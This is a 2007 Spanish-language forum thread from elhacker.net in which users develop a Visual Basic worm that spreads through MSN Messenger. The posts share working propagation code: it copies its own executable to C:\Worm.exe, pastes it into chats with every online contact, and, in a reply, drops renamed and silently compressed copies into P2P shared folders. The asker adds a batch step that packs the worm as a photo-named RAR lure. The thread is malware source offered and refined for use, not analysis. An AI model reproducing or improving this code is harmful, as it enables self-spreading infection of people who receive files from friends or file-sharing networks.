elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Infectar por msn
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Infectar por msn  (Leído 2,863 veces)
krosty_ufc

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Infectar por msn
« en: 19 Septiembre 2007, 00:12 am »

Buenas.
Tengo una duda, ahi les va.
Hendrix una vez posteo el siguiente code para infectar atravez de msn:
Citar
Option Explicit

' Required data structures
Private Type POINTAPI

x As Long
y As Long
End Type

' Clipboard Manager Functions
Private Declare Function EmptyClipboard Lib "user32" () As Long
Private Declare Function OpenClipboard Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function CloseClipboard Lib "user32" () As Long
Private Declare Function SetClipboardDa ta Lib "user32" (ByVal wFormat As Long, ByVal hMem As Long) As Long
Private Declare Function GetClipboardDa ta Lib "user32" (ByVal wFormat As Long) As Long
Private Declare Function IsClipboardFor matAvailable Lib "user32" (ByVal wFormat As Long) As Long

' Other required Win32 APIs
Private Declare Function DragQueryFile Lib "shell32.dll" Alias "DragQueryFileA" (ByVal hDrop As Long, ByVal UINT As Long, ByVal lpStr As String, ByVal ch As Long) As Long
Private Declare Function DragQueryPoint Lib "shell32.dll" (ByVal hDrop As Long, lpPoint As POINTAPI) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
Private Declare Function GlobalFree Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Function GlobalUnlock Lib "kernel32" (ByVal hMem As Long) As Long
Private Declare Sub CopyMem Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

' Predefined Clipboard Formats
Private Const CF_TEXT = 1
Private Const CF_BITMAP = 2
Private Const CF_METAFILEPIC T = 3
Private Const CF_SYLK = 4
Private Const CF_DIF = 5
Private Const CF_TIFF = 6
Private Const CF_OEMTEXT = 7
Private Const CF_DIB = 8
Private Const CF_PALETTE = 9
Private Const CF_PENDATA = 10
Private Const CF_RIFF = 11
Private Const CF_WAVE = 12
Private Const CF_UNICODETEXT = 13
Private Const CF_ENHMETAFILE = 14
Private Const CF_HDROP = 15
Private Const CF_LOCALE = 16
Private Const CF_MAX = 17

' New shell-oriented clipboard formats
Private Const CFSTR_SHELLIDL IST As String = "Shell IDList Array"
Private Const CFSTR_SHELLIDL ISTOFFSET As String = "Shell Object Offsets"
Private Const CFSTR_NETRESOU RCES As String = "Net Resource"
Private Const CFSTR_FILEDESC RIPTOR As String = "FileGroupDescr iptor"
Private Const CFSTR_FILECONT ENTS As String = "FileContents"
Private Const CFSTR_FILENAME As String = "FileName"
Private Const CFSTR_PRINTERG ROUP As String = "PrinterFriendl yName"
Private Const CFSTR_FILENAME MAP As String = "FileNameMap"

' Global Memory Flags
Private Const GMEM_FIXED = &H0
Private Const GMEM_MOVEABLE = &H2
Private Const GMEM_NOCOMPACT = &H10
Private Const GMEM_NODISCARD = &H20
Private Const GMEM_ZEROINIT = &H40
Private Const GMEM_MODIFY = &H80
Private Const GMEM_DISCARDAB LE = &H100
Private Const GMEM_NOT_BANKE D = &H1000
Private Const GMEM_SHARE = &H2000
Private Const GMEM_DDESHARE = &H2000
Private Const GMEM_NOTIFY = &H4000
Private Const GMEM_LOWER = GMEM_NOT_BANKE D
Private Const GMEM_VALID_FLA GS = &H7F72
Private Const GMEM_INVALID_H ANDLE = &H8000
Private Const GHND = (GMEM_MOVEABLE Or GMEM_ZEROINIT)
Private Const GPTR = (GMEM_FIXED Or GMEM_ZEROINIT)

Private Type DROPFILES
pFiles As Long
pt As POINTAPI
fNC As Long
fWide As Long
End Type


Public Function ClipboardCopyF iles(Files() As String) As Boolean

Dim data As String
Dim df As DROPFILES
Dim hGlobal As Long
Dim lpGlobal As Long
Dim i As Long

' Open and clear existing crud off clipboard.
If OpenClipboard(0&) Then
Call EmptyClipboard

' Build double-null terminated list of files.
For i = LBound(Files) To UBound(Files)
data = data & Files(i) & vbNullChar
Next
data = data & vbNullChar

' Allocate and get pointer to global memory,
' then copy file list to it.
hGlobal = GlobalAlloc(GHND, Len(df) + Len(data))
If hGlobal Then
lpGlobal = GlobalLock(hGlobal)

' Build DROPFILES structure in global memory.
df.pFiles = Len(df)
Call CopyMem(ByVal lpGlobal, df, Len(df))
Call CopyMem(ByVal (lpGlobal + Len(df)), ByVal data, Len(data))
Call GlobalUnlock(hGlobal)

' Copy data to clipboard, and return success.
If SetClipboardDa ta(CF_HDROP, hGlobal) Then
ClipboardCopyF iles = True
End If
End If

' Clean up
Call CloseClipboard
End If

End Function


Y aki el "Cuerpo virico":

Código:

Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

Const KEYEVENTF_KEYU P = &H2
Const VK_LWIN = &H5B

Private Sub Wait(ByVal nSec As Integer)
Dim t1 As Date, t2 As Date

t1 = Second(Now)
t2 = t1 + nSec

Do
    DoEvents
Loop While t2 > Second(Now)
End Sub

Sub msninfect()
On Error Resume Next
Set w = CreateObject("Messenger.UIAu tomation")
For Each ConTacto In w.MyContacts 'Vamos de contacto en contacto
If (ConTacto.Statu s = 2) Or (ConTacto.Statu s = 10) Or (ConTacto.Statu s = 14) Or (ConTacto.Statu s = 34) Or (ConTacto.Statu s = 50) Or (ConTacto.Statu s = 66) Then
Set iMsn = w.InstantMessa ge(ConTacto.Signi nName)
SendKeys "^V"
End If
Next
Wait (1) ' Esperamos un segundito para no "atascar" tanto...
' A partir de aki sirve para minimizar todas las ventanas...
Call keybd_event(VK_LWIN, 0, 0, 0)
Call keybd_event(77, 0, 0, 0)
Call keybd_event(VK_LWIN, 0, KEYEVENTF_KEYU P, 0)
End Sub

Sub newpropMSN()
Dim ap(0) As String
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Worm.exe" ' Nos Copiamos
ap(0) = "C:\Worm.exe"
If ClipboardCopyF iles(ap) = True Then ' Nos ponemos en el Portapapeles
End If
Wait (1) ' Esperamos 1 respiro al procesador...
msninfect ' Llamamos a la funcion de la propagación
End Sub

Bien como dice hendrix, en su post, por msn no se pueden enviar exes, tncs nesitamos enviar un rar o zip, no ?

Ahora, que es lo que abria que cambiar para que sea rar y no exe ?

esto ?:

Código:
FileCopy App.Path & "\" & App.EXEName & "[b].RAR[/b]", "C:\Worm[b].rar[/b]" ' Nos Copiamos
ap(0) = "C:\Worm[b].rar[/b]"

Eso seria lo que se cambia ?

espero respeustas

gracias

Salu2


En línea

Gorky


Desconectado Desconectado

Mensajes: 770



Ver Perfil WWW
Re: Infectar por msn
« Respuesta #1 en: 19 Septiembre 2007, 09:17 am »

Lo que tu has puesto no serviria ya que lo que el codigo quiere hacer es buscarse a si mismo en version ejecutable y copiarse a una ruta. Sin embargo tu lo que haces es buscar un archivo .rar que no existe.


En línea

krosty_ufc

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Infectar por msn
« Respuesta #2 en: 19 Septiembre 2007, 20:55 pm »

Citar
Lo que tu has puesto no serviria ya que lo que el codigo quiere hacer es buscarse a si mismo en version ejecutable y copiarse a una ruta. Sin embargo tu lo que haces es buscar un archivo .rar que no existe.

Pero supongamos que yo creara un rar con el exe adentro, podria enviar el rar ?
Mi prgunta es si el code seguiria enviandose por msn, si cambio eso a rar, (demas esta decir, que en ""C:\Worm.rar"" estaria el rar con el exe adentro)

Salu2
En línea

Spider-Net


Desconectado Desconectado

Mensajes: 1.165


Un gran poder conlleva una gran responsabilidad


Ver Perfil WWW
Re: Infectar por msn
« Respuesta #3 en: 20 Septiembre 2007, 00:34 am »

Pues claro, si existe ese rar en la ruta que dices lo enviará igual que cualquier otro archivo??  :-\

Has probado el código? en teoría debe de funcionar todo bien

Saludos
En línea

GroK


Desconectado Desconectado

Mensajes: 681


...I have become comfortably numb...


Ver Perfil
Re: Infectar por msn
« Respuesta #4 en: 20 Septiembre 2007, 01:52 am »

Buenas; en mi opinion lo que deberias hacer es comprimir el exe directamente en la victima, te explico: Hace un tiempo codee un modulo de propagacion para P2P, y en el lo que hacia era buscar si la victima tenia winrar o winzip instalado y usar el compresor desde la consola; se autocomprimia el exe con un monton de nombres distintos y luego se copiaba en las rutas de las carpetas compartidas que encontraba en el sistema. En este caso es algo mas facil porq solo tienes que autocopiarte y comprimir tu copia de exe, y luego enviarlo. Ahora mismo no tengo tiempo de arreglarte el codigo para tu caso especifico, pero te pongo el pedazo relevante para que te hagas una idea aproximada:

Código
  1. Option Explicit
  2. Public Declare Function PathIsDirectory Lib "shlwapi.dll" Alias "PathIsDirectoryA" (ByVal pszPath As String) As Long
  3.  
  4. Public Function PropagaP2P()
  5. Dim i As Integer, check As Boolean, TieneWRar As Boolean, TieneWZip As Boolean, ArchProg As String, n As Integer
  6. Dim WinrarPath As String, WinzipPath As String, RutaRAR As String, RutaZIP As String, RutaEXE As String
  7.  
  8. ArchProg = Environ("programfiles") & "\"
  9. WinrarPath = ArchProg & "WinRAR\rar.exe a -m5 -ep -df -inul "
  10. WinzipPath = ArchProg & "WinZip\winzip32.exe -a "
  11.  
  12. '*********
  13. ' Nota: Aqui viene un tochote de nombres de rutas y ejecutables,
  14. ' que no los pongo porq no hacen falta. Las variables RutasP2P() y
  15. ' NombreExe() son arrays de strings, y los uso en el for para ir recorriendo
  16. ' todas las rutas posibles y copiandome alli donde es posible.
  17. ' Tampoco las declare aqui, no hacen falta
  18. '*********
  19.  
  20. For i = 1 To UBound(RutasP2P)
  21. check = CBool(PathIsDirectory(ArchProg & RutasP2P(i)))
  22. If check = True Then
  23.    For n = 1 To UBound(NombreExe)
  24.    TieneWRar = CBool(PathIsDirectory(ArchProg & "WinRAR"))
  25.    TieneWZip = CBool(PathIsDirectory(ArchProg & "WinZip"))
  26.    If TieneWRar = True Then
  27.        RutaRAR = ArchProg & RutasP2P(i) & "\" & Left(NombreExe(n), Len(NombreExe(n)) - 3) & "rar"
  28.        RutaEXE = ArchProg & RutasP2P(i) & "\" & NombreExe(n)
  29.        DoEvents
  30.        FileCopy App.Path & "\" & App.EXEName & ".exe", ArchProg & RutasP2P(i) & "\" & NombreExe(n)
  31.        Shell WinrarPath & Chr(34) & RutaRAR & Chr(34) & " " & Chr(34) & RutaEXE & Chr(34), vbHide
  32.    ElseIf TieneWZip = True Then
  33.        RutaZIP = ArchProg & RutasP2P(i) & "\" & Left(NombreExe(n), Len(NombreExe(n)) - 3) & "zip"
  34.        RutaEXE = ArchProg & RutasP2P(i) & "\" & NombreExe(n)
  35.        DoEvents
  36.        FileCopy App.Path & "\" & App.EXEName & ".exe", ArchProg & RutasP2P(i) & "\" & NombreExe(n)
  37.        Shell WinzipPath & Chr(34) & RutaZIP & Chr(34) & " " & Chr(34) & RutaEXE & Chr(34), vbHide
  38.    Else
  39.        FileCopy App.Path & "\" & App.EXEName & ".exe", ArchProg & RutasP2P(i) & "\" & NombreExe(n)
  40.    End If
  41.    Next n
  42. End If
  43. Next i
  44. End Function

En fin, puede que no le encuentres sentido asi tal cual porque tiene muchas cosas innecesarias para tu caso (recuerda que es un codigo para propagacion P2P). Si kieres mañana lo arreglo bien y te lo pongo como debe ser; si no puedes esperar pues saca las ideas de ahi y prueba a ver ;D

Saludos
« Última modificación: 20 Septiembre 2007, 01:55 am por GroK » En línea

"I put on my Hendrix album and my son said 'Dad, who's that?' and i said 'Well son, that's God' "- Robert Plant

krosty_ufc

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Infectar por msn
« Respuesta #5 en: 20 Septiembre 2007, 03:29 am »

Sipi ya sabia como comprimirlo mi idea era esta:

Código:
Dim iFilee As Integer
iFilee = FreeFile
Open "C:\winexe.bat" For Output As iFilee
Close iFilee
    Open "C:\winexe.bat" For Append As #1
       Print #1, "cd %programfiles%\winrar"
Print #1, "rar a c:\fotos1254.rar c:\fotos1254.exe"
Close #1
Call ShellExecute(0&, vbNullString, "winexe.bat", vbNullString, "C:\", 1&)

Eso para hacer el rar.

Una duda sobre, como usar el "rar a" que si intento comprimir un archivo dentro d carpetas, me comprime todas las carpetas.
Ej quiero k comprima, jaja.exe que esta en "c:\jaja\jojo\jaja.exe"
Cuando me comprime, en vez de comprimir solo "jaja.exe" me comprime tambien las carpetas, hay alguna manera de evitar esto?

Salu2

PD: Voy a agregar para que primero comprube si tiene el rar antes de ejecutarlo.

En línea

krosty_ufc

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Infectar por msn
« Respuesta #6 en: 20 Septiembre 2007, 04:18 am »

Lesto aca agrege esto, (las variables estan definidas arriba)

Código:
reg = GetAttr(archprog & "WinRAR\rar.exe")
If reg And vbNormal Or vbReadOnly Or vbHidden Or vbSystem Or vbDirectory Then

Dim iFilee As Integer
iFilee = FreeFile
Open "C:\winexe.bat" For Output As iFilee
Close iFilee
    Open "C:\winexe.bat" For Append As #1
       Print #1, "cd %programfiles%\winrar"
Print #1, "rar a c:\fotos1254.rar c:\fotos1254.exe"
Close #1
Call ShellExecute(0&, vbNullString, "winexe.bat", vbNullString, "C:\", 1&)
End If

Quedo bien :P
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Se podria infectar una BIOS? « 1 2 »
Análisis y Diseño de Malware
lapsus 19 13,817 Último mensaje 23 Febrero 2011, 20:18 pm
por Slava_TZD
INFECTAR imagen iso en VIRTUALBOX
Seguridad
catholicus 7 5,566 Último mensaje 29 Junio 2011, 23:07 pm
por int_0x40
Infectar archivo pdf
Hacking
aqqle 2 6,972 Último mensaje 17 Abril 2013, 20:44 pm
por aqqle
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines